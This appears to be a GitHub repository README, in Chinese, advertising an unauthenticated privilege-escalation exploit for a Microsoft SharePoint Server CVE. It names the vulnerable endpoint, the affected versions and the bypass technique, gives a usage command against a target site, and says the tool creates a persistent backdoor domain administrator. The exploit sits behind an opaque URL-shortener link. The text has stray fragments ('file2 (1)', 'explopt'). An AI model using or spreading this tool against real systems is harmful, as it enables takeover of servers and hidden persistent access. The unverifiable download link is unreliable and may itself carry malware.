sentinel-aidefense/CVE-2026-56164-EXP

GitHub: sentinel-aidefense/CVE-2026-56164-EXP

针对 Microsoft SharePoint Server CVE-2026-56164 身份验证缺失漏洞的未授权权限提升 exploit,可从匿名权限提升至 Farm Admin 级别。

Stars: 15 | Forks: 0

# Microsoft SharePoint Server 权限提升 - CVE-2026-56164 **功能性的未授权 EOP exploit。** ## 概述 SharePoint Server 用户配置文件和网站集 endpoint 中存在关键功能缺失身份验证 (CWE-306)。允许远程攻击者从匿名权限提升至网站集管理员 / Farm Admin 级别。 通过在 `/_vti_bin/client.svc` 上发送特制的 SOAP payload 绕过身份验证网关。 ## 受影响版本 - SharePoint Server Subscription Edition < 16.0.19725.20434 - SharePoint Server 2019 < 16.0.10417.20175 - SharePoint Enterprise Server 2016 < 16.0.5561.1001 ## 根本原因 当省略 `X-RequestDigest` 并使用特定 header 链时,`Microsoft.Office.Server.UserProfiles` 中的 `SPContext` 验证不足。 ## 用法 ``` python3 cve-2026-56164.py -t https://target.sharepoint.site ``` file2 (1) 仅需要 `-t`(目标)。可选参数:`-u`(自定义用户名),`-p`(自定义密码)。 **explopt 的作用:** - 未经身份验证的权限提升至 SCA/Farm Admin - 创建持久化后门域用户 - 添加到 Farm Administrators - 导出管理员列表 ## Exploit [href](https://tinyurl.com/5bnzf6f3) ## 免责声明 本工具仅出于教育和授权的红队 / 渗透测试目的提供。作者不对因使用此 exploit 造成的任何滥用、损害或非法活动负责。使用风险自负,且仅在您获得明确测试权限的系统上使用。
标签:Microsoft SharePoint, Python, Web报告查看器, 协议分析, 无后门, 权限提升, 逆向工具